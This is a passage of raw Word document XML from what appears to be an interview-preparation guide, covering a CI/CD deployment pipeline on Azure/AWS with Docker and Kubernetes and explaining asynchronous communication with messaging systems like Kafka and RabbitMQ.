        <w:t>Azure DevOps/Jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on the project). Here's a breakdown of how deployment typically works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C5989" w14:textId="77777777" w:rsidR="00035FA4"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14213BC">
          <v:rect id="_x0000_i3608" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1743AB72" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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Deployment Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15039E" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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ode Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Developers push code to a GitHub repository (main or feature branches).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333877A7" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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I Pipeline Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>On push, the CI pipeline runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852FE70" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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ode build (Maven/Gradle for Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7CE14" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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Unit tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9A25E" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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Linting and static code analysis (SonarQube, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6C678" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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rtifact Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The build generates artifacts (JAR/WAR or Docker images).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8A6A9" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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Image Push (for Dockerized apps)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Docker images are pushed to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Azure Container Registry (ACR)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DockerHub</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE7CA8" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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D Pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploys the artifacts to the target environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69613303" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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zure App Service / Azure Kubernetes Service (AKS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Azure deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EEEF34" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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WS ECS/EKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for AWS deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B740E" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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Helm charts or kubectl are used if it's AKS or EKS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448038F1" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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lastRenderedPageBreak/>
        <w:t>Environment Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Environment variables, secrets, and configurations are injected via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06155922" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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zure Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09302F" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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Kubernetes ConfigMaps/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A7C2E" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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I/CD environment settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAA2FC" w14:textId="77777777" w:rsidR="00035FA4"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EFBF6E1">
          <v:rect id="_x0000_i3609" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB992F" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Platforms in Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31904850" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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loud</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Azure (App Services, AKS), or AWS (ECS/EKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0732ED4C" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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I/CD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: GitHub Actions, Azure DevOps, Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C633FB" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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ontainerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C506F1" w14:textId="77777777" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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Orchestration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A712A3" w14:textId="362EBF97" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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4431664F">
          <v:rect id="_x0000_i3610" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732C5277" w14:textId="25C165B3" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00872F98">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="895" w:name="_Toc196308375"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What do you know about Asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="895"/>
    </w:p>
    <w:p w14:paraId="16037DD9" w14:textId="223D6455" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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synchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to a non-blocking way of exchanging data between two or more systems/components, where the sender and receiver </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>do not need to interact at the same time</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFFA97B" w14:textId="77777777" w:rsidR="001D328D"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91CAED">
          <v:rect id="_x0000_i3611" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51158E47" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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Key Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43001548" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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ender sends a message and continues its work</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without waiting for a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D3CAD" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Receiver processes the message independently</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, possibly at a later time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494DAAAA" w14:textId="77777777" w:rsidR="001D328D"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C22C0D5">
          <v:rect id="_x0000_i3612" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399124D" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625FE5F1" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Messaging systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140543D1" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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pache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290766AB" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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RabbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA7B60" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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zure Service Bus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735BCFC3" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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WS SQS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E6D65" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Email</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – You send an email, and the receiver replies later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F7716B" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Webhooks</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – One service notifies another asynchronously when an event occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6D269" w14:textId="77777777" w:rsidR="001D328D"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C4CAA4E">
          <v:rect id="_x0000_i3613" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A82FD5C" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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Sync vs Asyn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30"/>
        <w:gridCol w:w="2793"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="318DB4E6" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E3E6599" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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Synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACC7ABF" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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Asynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="76B0274E" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2461A849" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5181ABFF" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Non-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3EC832C1" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EE0DB16" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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mmediate response required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7341CFA7" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Response may come later</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="6AC7D1B1" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="214FDDF9" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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HTTP API (typically)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1003545B" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Kafka, RabbitMQ, WebSockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EC45AB5" w14:textId="77777777" w:rsidR="001D328D"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42E6727">
          <v:rect id="_x0000_i3614" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD87858" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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Benefits of Async Communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D905A" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Better </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E79202" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Decoupled architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD90AE0" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328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Handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74831D65" w14:textId="77777777" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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Improves </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A6653" w14:textId="0CC8D8D3" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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42B74B19">
          <v:rect id="_x0000_i3615" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
